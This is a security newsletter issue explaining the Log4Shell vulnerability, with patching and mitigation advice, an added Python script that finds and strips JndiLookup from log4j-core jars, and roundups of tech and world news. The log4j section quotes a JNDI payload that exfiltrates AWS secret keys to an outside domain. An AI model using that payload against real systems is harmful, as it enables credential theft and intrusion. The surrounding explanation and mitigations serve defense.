News & Analysis | No. 311

SECURITY NEWS

The log4j (Log4Shell) Situation 

What Happened: A 0-day exploit was released for log4j—a Java-based logging utility that’s part of the Apache Logging Services project. It is used by millions of systems worldwide to process logs. 

Impact: People are comparing this to Heartbleed, but it’s much worse in a number of ways. Heartbleed affected all TLS implementations and this one only affects systems that use log4j, but this issue produces direct and immediate harm in the form of password/key extractions and shells.

This vulnerability will be with us for years because malicious payloads and vulnerable systems can sit dormant for any amount of time. At any moment they can come back alive and process a malicious payload that results in compromise.

How it Works: The vulnerability is due to insecure “lookup” functionality within log4j: strings inside logged messages are interpreted and expanded, so user-provided content ends up being executed as code, also known as RCE. So if you provide the input `${env:PWD}`, it’ll write the PWD environment variable to the log. It gets much worse from there, including the exfiltration of data out of the affected system and—most importantly—spawning a shell on the affected system.

Example: Here’s an example from @dildog of extracting AWS Keys and listening for incoming requests. 

${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.mydogsbutt.com}

What to Do: The best way to fix this is to find all your instances of log4j and patch them to 2.15+. If you can’t do that, there are a few possible mitigations:
  • Patching: Upgrade to version 2.15.0.
  • Mitigation: For those who cannot upgrade to 2.15.0, in releases >=2.10, this vulnerability can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.
    Note: WAF can help but won’t solve the problem. Most companies’ backend systems are already clogged with these malicious payloads, from multiple ingress points. We can’t fix the problem by stopping more from coming in. The only fix is securing the systems that will inevitably come in contact with that malicious input.
  • Detection: I know many companies using Semgrep to find vulnerable inclusions of user-provided data. Here’s an example Semgrep rule I got from Clint Gibler of R2C/TLDRSec.
  • Vaccination: This is definitely on the crazier side of things, but one clever approach is to use the vulnerability to mitigate the vulnerability. Specifically, it’s using the RCE functionality to set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. | Code via Cybereason
  • Other Considerations: As David Litchfield pointed out in a number of tweets, this isn’t just HTTP. Any service you have that takes input, including SMTP, IMAP, etc., is an additional attack vector. Also consider second and N-level order processing of content on the backend as part of batch processes and other types of automation.
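
Putting the “find all your instances” and fallback-mitigation steps above into one tool, as an added example that is not from the newsletter or the Log4j project: it walks a directory tree for log4j-core jars, classifies each by the version in its file name and by whether JndiLookup.class is still inside, and rewrites older jars without that class, which is what the zip command above does. The jars built in demo() are constructed stand-ins, not real log4j artifacts.

```python
import io, os, pathlib, re, tempfile, zipfile

# Entry that the page's "zip -q -d" mitigation removes from log4j-core.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"^log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$")

def classify_jar(path):
    """'patched' (>= 2.15.0), 'vulnerable' (older, JndiLookup present), 'mitigated' (older, class stripped)."""
    m = VERSION_RE.match(os.path.basename(path))
    if not m:
        return "unknown"  # cannot version the jar from its file name
    if tuple(int(x) for x in m.groups()) >= (2, 15, 0):
        return "patched"
    with zipfile.ZipFile(path) as zf:
        return "vulnerable" if JNDI_LOOKUP in zf.namelist() else "mitigated"

def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (same effect as the zip -d command); True if removed."""
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as dst:
            for info in (i for i in src.infolist() if i.filename != JNDI_LOOKUP):
                dst.writestr(info, src.read(info.filename))
    pathlib.Path(path).write_bytes(buf.getvalue())
    return True

def scan_tree(root):
    """Inventory step: classify every log4j-core jar under root, keyed by full path."""
    return {os.path.join(d, n): classify_jar(os.path.join(d, n))
            for d, _, files in os.walk(root) for n in files if VERSION_RE.match(n)}

def make_sample_jar(path):
    """Constructed stand-in for a real jar: a zip holding two dummy class entries."""
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"\xca\xfe\xba\xbe")
        zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")

def demo():
    """Build a 2.14.1 and a 2.15.0 sample jar, scan, strip the vulnerable one, rescan."""
    root = tempfile.mkdtemp()
    old, new = os.path.join(root, "log4j-core-2.14.1.jar"), os.path.join(root, "lib", "log4j-core-2.15.0.jar")
    os.makedirs(os.path.dirname(new))
    make_sample_jar(old); make_sample_jar(new)
    before = scan_tree(root)
    for p, status in before.items():
        if status == "vulnerable":
            strip_jndi_lookup(p)
    return sorted(before.values()), sorted(scan_tree(root).values())
```

It keys off the file name, so shaded or nested copies of log4j-core bundled inside other jars will not be found; that blind spot is exactly the asset-management problem the quote below points at.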
Analysis: What’s so remarkable about this vulnerability is not just its criticality or reach—but the root cause at the developer incentives level. Like Heartbleed—the project had very few eyes on it, and all those eyes were volunteers. What we should be thinking about isn’t just log4j. What we should be thinking about is how many other projects are out there that have similar characteristics:
  1. The project is maintained by very few people in their spare time for no money, and
  2. If the project had a major issue, it would disrupt the entire internet.
We simply have too much critical internet infrastructure maintained by a handful of people in their spare time. And those few people are often not able or incentivized to evaluate what they’re creating from a security standpoint.

This is not their fault. They’re heroes for keeping the lights on. It’s our fault because we know how bad the situation is and we just YOLO through life as if we didn’t. The result is that we get to learn about internet-stopping vulnerabilities from the Minecraft community.



The FBI says a ransomware gang out of Cuba has been launching ransomware attacks against US critical infrastructure. They’ve released IoCs to help others find attacks from the group. More

The FTC says Americans lost $148 million to gift card scams in 2021. More

Attackers are using the log4j vulnerability to install malware, including cryptominers and Mirai and Muhstik botnet clients. More

QNAP says there’s new cryptominer malware targeting vulnerable QNAP NAS devices. More

CIA Director William Burns said on Monday that the CIA “has a number of different projects focused on cryptocurrency”. He went on to say, “My predecessor had started this, but had set in motion a number of different projects focused on cryptocurrency and trying to look at second and third-order consequences as well and helping with our colleagues in other parts of the U.S. government to provide solid intelligence on what we’re seeing as well.” More

Incidents:
  • Volvo says attackers have stolen research and development information after hacking some of its servers. More
  • Marriott has suffered another data breach affecting 5.2 million guests. More
Vulnerabilities: 
  • log4j Critical RCE | Critical | RCE More
  • Sonicwall VPN Bugs in SMA 100-series Devices | Critical | RCE More
  • 4 WordPress Plugins | Critical | 1.6 Million Sites Affected More
  • Mozilla Firefox and Thunderbird | High More
Companies:
  • Incode raises $220 million to do identity verification and authentication. More

TECHNOLOGY NEWS
DeepMind has revealed a new 280 billion parameter language model called Gopher. More

Italy has fined Amazon $1.3 billion for abusing its market position. More

Over 200 US newspapers have filed suit against Facebook and Google for monopolizing digital ad revenue—and by extension—online news. More

Meta has released Horizon Worlds, its social virtual reality space, to the world after more than a year in private testing mode. The platform functions much like Roblox in that you can create your own games within the base game. You currently can’t make money from your own games, but you can enter creator competitions and win money that way. More

Sports streaming is starting to intersect with sports betting, and Disney is deep into it. It’s the combination of watching sports with your friends and betting at the same time. More

People have spent $27 billion on NFTs in 2021 so far. Cryptopunks are the most popular collection with $3 billion in sales. More


HUMAN NEWS
Evergrande is a massive real estate company in China with over 200,000 employees, and it has defaulted on over $300 billion in outstanding liabilities. Beijing has intervened to prevent a collapse of the company. More

A new paper in Nature finds that exercise plasma boosts memory and dampens brain inflammation in mice. Interestingly, it shows that that plasma can be transferred to other mice, where they see the benefits as well. More

New research shows that Covid attacks fat tissue, which could be why obese people have been at higher risk of severe illness and death. More

Germany reported 70,000 new Covid infections last Wednesday, along with 534 deaths. These are the highest numbers in the country since February. More

60% of Republicans are confident in doctor’s advice, down from 73% in 2010. More


CONTENT, IDEAS & ANALYSIS
The Vigilant — We should have a new internet group called The Vigilant—a group of open-source code maintainers that steward and protect our top 1000 open-source applications. Read the Blog


NOTES
I was sad to hear that Anne Rice has died. She was 80. More than vampires, she gave me a love for New Orleans. So much so that when I visited it, it seemed somewhat familiar. She’ll be missed. More

I’m really looking forward to taking some time off soon around the holidays. I have a good amount of content that’s around 60-80% done, and I want to get it all over the line by January 1st. 

Thanks to Caleb Sima for input into my log4j analysis above.


DISCOVERY  

Ben Evans put out the latest version of his annual presentation on technology trends, and it’s remarkably good as usual. Covers the rebranding of Web 1, 2, and 3, Crypto, VR/AR, NFTs, and so much more. More

Ryan Holiday’s 9 Rules for a better life. More

A Semgrep rule for detecting insecure log4j logging. More

“This week the internet has learned—once again—that asset management is the center of security. It’s hard to patch what you can’t find.” — Daniel Miessler

“The most consequential figures in the tech world are half guys like steve jobs and bill gates and half some guy named Ronald who maintains a Unix tool called ‘runk’ which stands for Ronald’s Universal Number Kounter and handles all math for every machine on earth.” — Druthers Haver

StopLyingCloud — An honest AWS service health dashboard. More

Amazon Brand Detector — A Chrome extension for detecting which products on Amazon are Amazon-owned. More

TimeandDate — A tool for seeing where planets are visible in the night sky where you live. More

Diagrams — Draw cloud system architecture diagrams using Python code. More

Log4Shell Recon and Post-Exploitation Network Detection — A collection of detection rules and IOCs by NCC. More | by NCC Research

Log4jAttackSurface — A Curated List of Companies and Technologies Affected by Log4Shell More | by YfryTcshsGD

Border Collie — Uses Semgrep and watchdog to detect reverse shells in your environment. More


RECOMMENDATIONS

Many people in tech have been working tirelessly since Thursday on Log4Shell. If you have any authority or influence to help them at work, make sure they get some public love within the organization, along with some extra time off. 


APHORISMS
“We don’t rise to the level of our goals. We fall to the level of our systems.”

James Clear